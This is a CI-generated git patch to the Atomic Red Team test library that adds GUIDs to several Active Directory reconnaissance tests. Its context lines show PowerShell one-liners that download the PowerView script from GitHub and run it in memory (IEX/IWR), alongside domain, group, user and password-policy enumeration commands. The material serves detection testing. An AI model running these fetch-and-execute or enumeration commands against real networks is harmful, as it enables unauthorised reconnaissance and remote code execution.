From 5e47dae27bdc609f6776f3af93510fb1784906da Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 17:32:49 +0000
Subject: [PATCH] Generate GUIDs from job=generate_and_commit_guids_and_docs
 branch=master [skip ci]

---
 atomics/T1018/T1018.yaml         | 3 +++
 atomics/T1069.002/T1069.002.yaml | 2 ++
 atomics/T1087.002/T1087.002.yaml | 1 +
 atomics/T1201/T1201.yaml         | 2 ++
 atomics/used_guids.txt           | 8 ++++++++
 5 files changed, 16 insertions(+)

diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index b5460626..c1b676c6 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -311,6 +311,7 @@ atomic_tests:
     name: powershell
     elevation_required: false
 - name: Enumerate Active Directory Computers with Get-AdComputer
+  auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
   description: |
     The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
     Upon successful execution a listing of Computers will output with their paths in AD.
@@ -336,6 +337,7 @@ atomic_tests:
     command: |
       ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
 - name: Get-DomainController with PowerView
+  auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
   description: |
     Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
   supported_platforms:
@@ -346,6 +348,7 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
     name: powershell
 - name: Get-wmiobject to Enumerate Domain Controllers
+  auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
   description: |
     The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
     Upon successful execution a listing of Systems from AD will output with their paths.
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 0b8911c4..ca4b2d31 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -134,6 +134,7 @@ atomic_tests:
       #{adfind_path} -f (objectcategory=group)
     name: command_prompt
 - name: Enumerate Active Directory Groups with Get-AdGroup
+  auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
   description: |
     The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
     Upon successful execution a listing of groups will output with their paths in AD.
@@ -195,6 +196,7 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
     name: powershell 
 - name: Get-DomainGroup with PowerView
+  auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
   description: |
     Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
   supported_platforms:
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 6b58abdc..79f6cdf7 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -216,6 +216,7 @@ atomic_tests:
       Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
 
 - name: Get-DomainUser with PowerView
+  auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
   description: |
     Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
   supported_platforms:
diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml
index 0a7c409c..43716efe 100644
--- a/atomics/T1201/T1201.yaml
+++ b/atomics/T1201/T1201.yaml
@@ -86,6 +86,7 @@ atomic_tests:
     command: pwpolicy getaccountpolicies
     name: bash
 - name: Get-DomainPolicy with PowerView
+  auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
   description: |
     Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
   supported_platforms:
@@ -96,6 +97,7 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
     name: powershell
 - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+  auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
   description: |
     The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
     Upon successful execution a listing of the policy implemented will display.
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 80e8ed2f..b8ce28f8 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -890,3 +890,11 @@ a27418de-bdce-4ebd-b655-38f04842bf0c
 46352f40-f283-4fe5-b56d-d9a71750e145
 02e8be5a-3065-4e54-8cc8-a14d138834d3
 d6139549-7b72-4e48-9ea1-324fc9bdf88a
+97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+b9d2e8ca-5520-4737-8076-4f08913da2c4
+e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+5a8a181c-2c8e-478d-a943-549305a01230
+93662494-5ed7-4454-a04c-8c8372808ac2
+3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+b2698b33-984c-4a1c-93bb-e4ba72a0babb